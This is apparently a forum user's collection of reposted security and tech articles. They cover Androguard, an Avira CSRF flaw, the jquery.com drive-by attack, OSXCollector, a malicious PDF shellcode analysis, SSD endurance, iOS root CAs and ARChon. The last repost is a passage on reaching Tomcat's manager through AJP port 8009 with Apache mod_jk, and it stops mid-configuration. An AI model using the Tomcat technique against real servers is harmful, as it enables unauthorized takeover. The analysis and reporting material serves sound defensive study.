Everything posted by Nytro
-
A quick fix is already available: apt-get update / yum update, or whatever else you use.
-
##########################################################################
################################ Androguard ##############################
##########################################################################
################### http://code.google.com/p/androguard ##################
######################## dev (at) androguard.re ##########################
##########################################################################

1 -] About

Androguard (Android Guard) is primarily a tool written entirely in Python to play with:
- DEX, ODEX
- APK
- Android's binary XML

2 -] Usage

You need to follow the instructions on the wiki to install the dependencies for androguard:
http://code.google.com/p/androguard/wiki/Installation

You must go to the website to see more examples:
http://code.google.com/p/androguard/wiki/Usage

2.1 --] API

2.1.1 ---] Instructions
http://code.google.com/p/androguard/wiki/Instructions

2.2 --] Demos

See the source code in the directory 'demos'.

2.3 --] Tools
http://code.google.com/p/androguard/wiki/Usage

2.4 --] Disassembler
http://code.google.com/p/androguard/wiki/Disassembler

2.5 --] Analysis
http://code.google.com/p/androguard/wiki/Analysis

2.6 --] Visualization
http://code.google.com/p/androguard/wiki/Visualization

2.7 --] Similarities, diffing, plagiarism/rip-off indicator
http://code.google.com/p/androguard/wiki/Similarity
http://code.google.com/p/androguard/wiki/DetectingApplications

2.8 --] Open source database of Android malware (links + signatures)
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares

2.9 --] Decompiler

2.10 --] Reverse engineering tutorial of Android apps
http://code.google.com/p/androguard/wiki/RE

3 -] Roadmap/Issues

Features and roadmap:
http://code.google.com/p/androguard/wiki/RoadMap

4 -] Authors: Androguard Team

Androguard + tools: Anthony Desnos <desnos at t0t0.fr>
DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com>

5 -] Contributors

Craig Smith <agent dot craig at gmail dot com>: 64-bit patch + magic tricks

6 -] Licenses

6.1 --] Androguard

Copyright © 2012, Anthony Desnos <desnos at t0t0.fr>
All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

6.2 --] DAD

Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com>
All rights reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Source: https://github.com/androguard/androguard
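Side note before installing anything: an APK is an ordinary ZIP archive, so Python's standard library can already enumerate the pieces androguard goes on to parse (classes.dex, AndroidManifest.xml). A minimal sketch using a synthetic in-memory archive, not a real APK:

```python
import io
import zipfile

# An APK is just a ZIP container; build a synthetic one in memory and
# list the entries androguard would parse for real.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as apk:
    apk.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML chunk header
    apk.writestr("classes.dex", b"dex\n035\x00")              # DEX magic

with zipfile.ZipFile(buf) as apk:
    print(apk.namelist())  # -> ['AndroidManifest.xml', 'classes.dex']
```

On a real sample you would pass the APK path to zipfile.ZipFile directly; androguard then takes over for the actual DEX and binary-XML parsing.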
-
Avira – Critical CSRF Flaw Puts Millions of Users at Risk
by Pierluigi Paganini on September 20th, 2014

An Egyptian bug hunter discovered that the Avira website is affected by a CSRF flaw that allows attackers to hijack users' accounts and access their online backups.

What would you think if I told you that an antivirus could represent a menace to your system? Antivirus software, like any other kind of software, can be exploited by threat actors to compromise the machine, as already explained in my previous post. The popular Avira antivirus, which includes a Secure Backup service, is vulnerable to a critical web application flaw that could allow an attacker to take over a user's account.

The 16-year-old Egyptian expert Mazen Gamal reported to The Hacker News that the Avira website is affected by a CSRF (cross-site request forgery) vulnerability that allows an attacker to hijack users' accounts and access their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users' accounts at risk.

CSRF makes an authenticated end user execute unwanted actions on a web application. In a typical attack scheme, the attacker sends a link via email or through a social media platform, or shares a specially crafted HTML exploit page, to trick the victim into executing actions of the attacker's choosing. In this specific case, an attacker could use a CSRF exploit to trick a victim into opening a malicious link containing requests that replace the victim's email ID on their Avira account with the attacker's email ID.

With this CSRF attack the victim's account can be easily compromised: having replaced the email address, the attacker can simply reset the password of the victim's account through the forgotten-password procedure, because Avira will send the password reset link to the attacker's email ID instead of the victim's.

Once the attacker gains access to the victim's account, he can retrieve the victim's online backup, which includes files the user has stored with the Online Backup software (https://dav.backup.avira.com/).

"I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account," Gamal said via an email to The Hacker News. "The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user."

Gamal also provided a proof-of-concept video to demonstrate his discovery. He reported the vulnerability to the Avira security team on August 21st; the team acknowledged the flaw and fixed the CSRF bug on their website, but the secure online backup service remains exposed until Avira offers an offline password layer for decrypting files locally. Mazen Gamal has been recognized as an official bug hunter by Avira.

Pierluigi Paganini (Security Affairs – AVIRA, CSRF)

Source: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
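For context, this class of attack usually takes the shape of an invisible auto-submitting form hosted on an attacker page. A generic sketch of such a PoC generator (the endpoint and field names here are hypothetical placeholders, not Avira's actual ones):

```python
# Build a generic CSRF proof-of-concept page: an auto-submitting form
# that silently POSTs an attacker-controlled value to a state-changing
# endpoint while the victim is logged in. All names are made up.

def build_csrf_poc(target_url, fields):
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(name, value)
        for name, value in fields.items()
    )
    return """<html>
  <body onload="document.forms[0].submit()">
  <form action="{}" method="POST">
{}
  </form>
  </body>
</html>""".format(target_url, inputs)

poc = build_csrf_poc(
    "https://victim-site.example/account/change-email",  # hypothetical endpoint
    {"email": "attacker@evil.example"},
)
print(poc)
```

The standard defense is a per-session anti-CSRF token in every state-changing form, which a page like this cannot guess.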
-
Official jQuery Website Abused in Drive-by Download Attack
By Eduard Kovacs on September 23, 2014

The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported.

Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said.

"Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privileged account holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post.

According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit.

The RIG exploit kit was recently seen in several malvertising campaigns, and is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload. After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used.
The redirector domain used in the attack (jquery-cdn[.]com) is hosted in Russia and was registered on September 18, the day the attack started. Fortunately, the administrators of jQuery.com have removed the malicious code, but the redirector domain is still online as of September 23.

The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked.

Source: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
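Injections of this kind are often caught by scanning served pages for iframes styled to be invisible. A crude sketch of such a check (the patterns are deliberately simplified; real campaigns obfuscate far more heavily, and the domain below is a defanged placeholder):

```python
import re

# Flag iframes hidden via zero size or display:none -- a common, though
# easily evaded, marker of injected drive-by redirectors.
HIDDEN_IFRAME = re.compile(
    r'<iframe[^>]*(?:width="?0"?|height="?0"?|display:\s*none)[^>]*>',
    re.IGNORECASE,
)

def find_hidden_iframes(html):
    return HIDDEN_IFRAME.findall(html)

page = '<p>hi</p><iframe src="http://jquery-cdn.example/x" width="0" height="0"></iframe>'
print(find_hidden_iframes(page))
```

A real monitoring pipeline (as RiskIQ runs) would render the page in an instrumented browser instead, since injected content is usually assembled by script at load time.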
-
How'd that malware get there?

That's the question you've got to answer for every OS X malware infection. We built OSXCollector to make that easy, and to let you quickly parse its output to get an answer.

A typical infection might follow a path like this:
- a phishing email leads to a malicious download
- once installed, the initial payload establishes persistence
- then it reaches out on the network and pulls down additional payloads

With the output of OSXCollector we can quickly correlate between browser history, startup items, downloads, and installed applications. It makes it easy to root-cause an infection, collect IOCs, and get to the bottom of things.

So what does it do?

OSXCollector gathers information from plists, SQLite databases, and the local filesystem to get the information needed for analyzing a malware infection. The output is JSON, which makes it easy to process further with other tools.

Usage

The tool is self-contained in one script file, osxcollector.py. Launch OSXCollector as root, or it will be unable to read data from all accounts:

$ sudo ./osxcollector.py

Before running the tool, make sure your web browsers (Safari, Chrome, or Firefox) are closed. Otherwise OSXCollector will not be able to access their diagnostic files when collecting data.

Source: https://github.com/Yelp/osxcollector
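Since the output is JSON, downstream filtering needs only the standard library. A sketch of grepping collected records for a suspect indicator; the record layout below is illustrative, not the tool's exact schema:

```python
import json

# Filter OSXCollector-style JSON lines for records mentioning a suspect
# string (domain, path, hash). Field names here are made up for illustration.
def grep_records(lines, needle):
    hits = []
    for line in lines:
        record = json.loads(line)
        if needle in json.dumps(record):
            hits.append(record)
    return hits

sample = [
    json.dumps({"section": "quarantines", "url": "http://evil.example/dl"}),
    json.dumps({"section": "startup", "path": "/Library/LaunchDaemons/x.plist"}),
]
print(grep_records(sample, "evil.example"))
```

The same loop scales to piping the collector's real output file through any IOC list you maintain.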
-
Malicious Documents – PDF Analysis in 5 steps

Mass mailings and targeted campaigns that use common files to host or exploit code have been, and remain, a very popular vector of attack. In other words: a malicious PDF or MS Office document received via e-mail or opened through a browser plug-in. In regards to malicious PDF files, the security industry saw a significant increase in vulnerabilities after the second half of 2008, which might be related to Adobe Systems' release of the specifications, format structure and functionality of PDF files.

Most enterprise network perimeters are protected by several security filters and mechanisms that block threats. However, a malicious PDF or MS Office document can be very successful at passing through firewalls, intrusion prevention systems, anti-spam, anti-virus and other security controls. Once it reaches the victim's mailbox, this attack vector leverages social engineering techniques to lure the user into clicking/opening the document. If the user opens a malicious PDF file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This can cause the application to corrupt memory on the stack or heap, making it run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability can be exploited without even opening the file, just by having the malicious file on the hard drive, as described by Didier Stevens.

From a 100-foot view, a PDF file is composed of a header, body, reference table and trailer. One key component is the body, which may contain all kinds of content-type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex, which means the same information can be encoded and obfuscated in many ways.
For example, within objects there are streams that can be used to store data of any type and size. These streams are compressed, and the PDF standard supports several algorithms, called Filters, including ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode and DCTDecode. PDF files can contain multimedia content and support JavaScript, and ActionScript through Flash objects. JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques, making detection harder. If the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All these features and capabilities translate into a huge attack surface!

From a security incident response perspective, knowing how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of file, an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore, it helps one be better prepared to identify future security incidents and to contain, eradicate and recover from those threats. So which steps should an incident handler or malware analyst perform to analyze such files? In the case of malicious PDF files there are 5 steps. Using the REMnux distro, the steps are described by Lenny Zeltser as:

1. Find and extract JavaScript
2. Deobfuscate JavaScript
3. Extract the shellcode
4. Create a shellcode executable
5. Analyze the shellcode and determine what it does

A summary of tools and techniques using REMnux to analyze malicious documents is given in the cheat sheet compiled by Lenny, Didier and others. To practice these skills and give an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign.
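Of the filters above, FlateDecode is by far the most common, and it is ordinary zlib/deflate: once a stream's raw bytes are carved out of the file, they can be inflated by hand. A minimal sketch (the round-trip below stands in for bytes carved from a real object stream):

```python
import zlib

# A PDF stream compressed with /FlateDecode is plain zlib data.
# Compressing a snippet here simulates bytes carved out of a real PDF object.
raw_stream = zlib.compress(b"var payload = unescape('%u06eb%u0000');")

decoded = zlib.decompress(raw_stream)
print(decoded.decode("ascii"))
```

This is exactly what pdf-parser.py's --filter switch does for you, but doing it once by hand makes the tool's output easier to trust.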
The email contained an attachment with a malicious PDF file that took advantage of the Adobe Reader JavaScript engine to exploit CVE-2013-2729. This vulnerability, found by Felipe Manzano, exploits an integer overflow in several versions of Adobe Reader when parsing BMP files compressed with RLE8 encoding in PDF forms. The file on VirusTotal was detected by only 6 of the 55 AV engines. Let's go through each of the steps to find information on the malicious PDF's key characteristics and capabilities.

1st Step – Find and extract JavaScript

One technique is to use Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contains some of these keywords. In this case, the first observation shows that the PDF file contains 6 objects and 2 streams. No JavaScript is mentioned, but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms, which might indicate it is malicious.

Looking deeper, we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity, but in this case Object 2 is the /XFA element, which references Object 1, which contains a compressed and rather suspicious stream. Following this indicator, pdf-parser.py allows us to show the contents of an object and pass the stream through one of the supported filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) via the --filter switch. The --raw switch shows the output in an easier-to-read form. The output of the command is redirected to a file. Looking at the contents of this file, we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren't visible in the original PDF file.
If this document is opened by a victim, the /XFA keyword will execute this malicious code. Another fast way to find out whether the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files: it helps show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, and execute JavaScript and shellcode. When running the malicious PDF file against the latest version of the tool, it shows very useful information about the PDF structure and its contents, and can even detect which vulnerability the file triggers if it has a signature for it.

2nd Step – Deobfuscate JavaScript

The second step is to deobfuscate the JavaScript, which can contain several layers of obfuscation. In this case quite some manual cleanup of the extracted code was needed just to get the code isolated. The object.raw file contained 4 JavaScript elements between <script xxxx contentType="application/x-javascript"> tags and 1 image in base64 format in an <image> tag. The JavaScript code between tags needs to be extracted and placed into a separate file. The same can be done for the chunk of base64 data, which, when decoded, produces a 67MB BMP file. The JavaScript in this case was rather cryptic, but there are tools and techniques that help interpret and execute the code. Here I used a tool called js-didier.pl, which is Didier Stevens' version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows you to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, executes the code and prints the results into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup, but it was enough to produce several eval log files with interesting results.
3rd Step – Extract the shellcode

The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. Among other things, the file contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode, and you will typically find shellcode in JavaScript encoded this way. These Unicode-encoded strings need to be converted into binary. To do this, isolate the Unicode-encoded strings into a separate file and convert the Unicode (\u) notation to hex (\x) notation, using a series of Perl regular expressions wrapped in a REMnux script called unicode2hex-escaped. The resulting file will contain the shellcode in hex format ("\xeb\x06\x00\x00..") that will be used in the next step to convert it into a binary.

4th Step – Create a shellcode executable

Next, with the shellcode encoded in hexadecimal format, we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py, written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states, "The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its execution. This approach is useful for analyzing shellcode that's difficult to understand without stepping through it with a debugger."

5th Step – Analyze the shellcode and determine what it does

The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case, static analysis of the shellcode using the strings command shows several API calls used by the shellcode. It also shows a URL pointing to an executable that will be downloaded if the shellcode gets executed. We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend our networks.
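The \u-to-\x rewrite in step 3 boils down to a single substitution once byte order is accounted for. A sketch of what the unicode2hex-escaped script effectively does, assuming each \uXXXX token packs two shellcode bytes little-endian:

```python
import re

# Each \uXXXX token holds two shellcode bytes in little-endian order,
# so \u06eb becomes \x06 followed by \xeb reversed: swap the hex pairs.
def unicode_to_hex(escaped):
    return re.sub(r'\\u([0-9a-fA-F]{2})([0-9a-fA-F]{2})',
                  r'\\x\2\\x\1', escaped)

print(unicode_to_hex(r'\u06eb\u0000'))  # -> \xeb\x06\x00\x00
```

Note how \u06eb yields \xeb\x06, matching the "\xeb\x06\x00\x00.." prefix seen in this sample's extracted shellcode.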
This URL can be used as evidence to identify whether machines have been compromised and have attempted to download the malicious executable. At the time of this analysis the file was no longer there, but it's known to be a variant of the Gameover Zeus malware.

The steps followed are manual, but with practice they are repeatable. They represent just a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist, and much deeper analysis can be done. The focus was to demonstrate the 5 steps that can be used as a framework to discover indicators of compromise that will reveal machines compromised by the same bad guys, though many other questions could be answered with them as well. Using the mentioned and other tools and techniques within the 5 steps, we can gain a better practical understanding of how malicious documents work and which methods attackers use. Two great resources for this type of analysis are the book Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code by Michael Ligh and the SANS course FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques.

Source: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
-
The SSD Endurance Experiment: Only two remain after 1.5PB
Another one bites the dust
by Geoff Gasior — 11:35 AM on September 19, 2014

You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most.

Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though—and you won't believe which one. Seriously, you won't. But I'll stop now.

To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today. Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem.

Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside minuscule cells built with process geometries as small as 16 nm.
The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch—and there always is one—is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area.

Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result.

As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffered a rash of reallocated sectors, programming failures, and erase failures before its ultimate demise. Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors, split between an initial spate at 300TB and a second accumulation near the end of the road.
So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: Over the last 100TB, the Neutron compensated for over 3400 sector failures. And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it. Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible. We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm. 
Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests. Now that we've tended to the dead, it's time to check in on the living...

Full article: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
-
An Analysis of the CAs trusted by iOS 8.0
Posted on September 22, 2014 by Karl Kornel

iOS 8.0 ships with a number of trusted certificates (also known as "root certificates" or "certificate authorities"), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, plus any intermediate certificates needed to make a "chain of trust" back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site's certificate because it trusts a root certificate.

iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I'm going to take a look at these 222 certificates. First I'm going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I'm going to look at who owns these trusted roots.

Perl is Awesome

Before I go on, a quick shout-out: Perl is awesome! I used a Perl script to parse Apple's list, and to generate the numbers below. If you want the script, here it is: The quick-and-dirty Perl script (signature). The list of CAs (signature).

Key Sizes

The root certificates use either RSA or ECC for their keys. Here's how the numbers break down:

4096-bit RSA: 44 CAs
2048-bit RSA: 138 CAs
1024-bit RSA: 27 CAs
384-bit ECC: 12 CAs
256-bit ECC: 1 CA

On the RSA side, the numbers don't surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys, rather than move to ECC (or before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that's good, but I am concerned by the algorithm choices.
The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves is trustworthy, according to SafeCurves. I would not be surprised if the number of ECC keys stays stable while the number of 4096-bit RSA keys goes up. Most (if not all) of the widely supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves in web browsers and servers.

Signature Hashes

When we look at the hashing algorithms used to sign these root certificates, SHA is the order of the day:

SHA-512: 1 CA
SHA-384: 17 CAs (including 12 of the CAs using ECC keys)
SHA-256: 42 CAs (including 1 of the CAs using ECC keys)
SHA-1: 149 CAs
MD-5: 10 CAs
MD-2: 3 CAs

First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren't used here, so I'm ignoring them!

Again we see the slow move away from SHA-1, and that's good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really? Looking at MD-5, Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original "Class 1,2,3 Public Primary Certification Authority" CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong! This inclusion really surprises me: if you try to load your own MD-5 root certificate into iOS, it will not be trusted.
And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms. Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not. Certificate Owners Companies It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0: AC Camerfirma SA: 4 CAs Apple: 4 CAs Comodo: 4 CAs Digicert: 8 CAs Entrust: 5 CAs Geotrust: 4 CAs Globalsign: 6 CAs Netlock Kft: 5 CAs Symantec: 6 CAs TC Trustcenter GMBH: 6 CAs Thawte: 12 CAs The Usertrust Network: 5 CAs Verisign: 17 CAs All told, Symantec owns thirty-five CAs, thanks to Verisign’s purchase of Thawte, and Symantec’s purchase of Verisign. I don’t hold that against Symantec, though: Most of the CAs were issued before the purchase, and it’s too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: How many certificate authorities does one company actually need? Governments There are a number of governments whose CAs are included in iOS 8.0: China: 1 CA, via the China Internet Network Information Center Hong Kong: 1 CA, via the Hongkong Post e-Cert. Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT) Netherlands: 3 CAs, via PKIoverheid Taiwan: 1 CA, via the Government Root Certification Authority Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey United States: 5 CAs, via the Department of Defense Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there’s no need to crack the encryption, and you probably don’t even need an inside line to Verisign! 
You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or …) using one of your own governmental CAs, which iOS already recognizes. Unfortunately, I cannot see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can’t tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites. Final Thoughts First of all, it’s good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of the site’s certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension? The security-conscious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing. There is no way to disable any of the root CAs that come with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don’t like? With all the work that Apple does to secure iOS devices, that makes me trust Apple enough to take it. I’m going to continue using my iPhone 5, with iOS 8.0. Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
-
Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows. See the custom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
-
8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is that you can also access that manager interface on port 8009. This is the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It is an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles It’s not often that you encounter port 8009 open and port 8080, 8180, 8443 or 80 closed, but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it, right? As stated in one of the quotes, you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first); what follows is just an overview of the commands I used on my own machine. I omitted some of the original instructions since they didn’t seem to be necessary.
(apache must already be installed)

sudo apt-get install libapache2-mod-jk

sudo vim /etc/apache2/mods-available/jk.conf

# Where to find workers.properties
# Update this path to match your conf directory location
JkWorkersFile /etc/apache2/jk_workers.properties
# Where to put jk logs
